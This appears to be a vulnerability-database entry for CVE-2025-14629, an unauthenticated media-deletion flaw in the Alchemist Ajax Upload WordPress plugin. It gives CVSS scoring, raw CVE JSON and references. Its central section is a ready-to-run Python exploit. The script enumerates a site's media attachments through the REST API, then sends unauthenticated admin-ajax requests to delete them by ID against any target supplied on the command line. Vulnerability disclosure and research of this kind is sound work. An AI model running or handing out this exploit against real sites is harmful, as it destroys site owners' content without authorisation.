Security Vulnerability Report
中文
CVE-2025-14629 CVSS 5.3 MEDIUM

CVE-2025-14629

Published: 2026-01-24 08:16:06
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Alchemist Ajax Upload plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the 'delete_file' function in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary WordPress media attachments.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Alchemist Ajax Upload plugin <= 1.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14629 PoC - Unauthenticated Arbitrary File Deletion # Target: WordPress Alchemist Ajax Upload Plugin <= 1.1 def delete_media_attachment(target_url, attachment_id): """ Delete arbitrary WordPress media attachment without authentication Args: target_url: Base URL of the WordPress site attachment_id: ID of the media attachment to delete Returns: Response from the server """ ajax_endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Construct the deletion request data = { 'action': 'alchemist_delete_file', # Plugin's AJAX action 'file_id': str(attachment_id) # Attachment ID to delete } try: # Send POST request without authentication response = requests.post(ajax_endpoint, data=data, timeout=10) return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def enumerate_attachments(target_url): """ Enumerate available media attachments via REST API Args: target_url: Base URL of the WordPress site Returns: List of attachment IDs """ rest_endpoint = f"{target_url.rstrip('/')}/wp-json/wp/v2/media?per_page=100" try: response = requests.get(rest_endpoint, timeout=10) if response.status_code == 200: attachments = response.json() return [(att['id'], att['source_url'], att['title']['rendered']) for att in attachments] except: pass return [] def main(): if len(sys.argv) < 3: print("Usage: python cve-2025-14629.py <target_url> <attachment_id>") print("Example: python cve-2025-14629.py http://example.com 123") sys.exit(1) target = sys.argv[1] attachment_id = sys.argv[2] print(f"[*] CVE-2025-14629 - Alchemist Ajax Upload Unauth File Deletion") print(f"[*] Target: {target}") print(f"[*] Attachment ID to delete: {attachment_id}") # First, enumerate attachments if no specific ID provided if attachment_id == 'enumerate': print("\n[*] Enumerating media attachments...") attachments = enumerate_attachments(target) if attachments: print(f"[+] Found {len(attachments)} attachments:") for att_id, url, title in attachments: print(f" - ID: {att_id}, Title: {title}, URL: {url}") else: print("[-] No attachments found or enumeration failed") return # Attempt to delete the specified attachment print(f"\n[*] Attempting to delete attachment {attachment_id}...") response = delete_media_attachment(target, attachment_id) if response: print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text[:500]}") if response.status_code == 200: print("[+] Deletion request sent successfully") else: print("[-] Unexpected response") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14629", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:05.713", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Alchemist Ajax Upload plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the 'delete_file' function in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary WordPress media attachments."}, {"lang": "es", "value": "El plugin Alchemist Ajax Upload para WordPress es vulnerable a la eliminación no autorizada de archivos multimedia debido a una comprobación de capacidad faltante en la función 'delete_file' en todas las versiones hasta la 1.1, inclusive. Esto hace posible que atacantes no autenticados eliminen archivos adjuntos multimedia arbitrarios de WordPress."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/alchemist-ajax-upload/tags/1.1/alchemist_ajax_upload.php#L231", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/alchemist-ajax-upload/trunk/alchemist_ajax_upload.php#L231", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/alchemist-ajax-upload/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/865dbcf5-7990-40f3-bb90-3ae359b52c6f?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.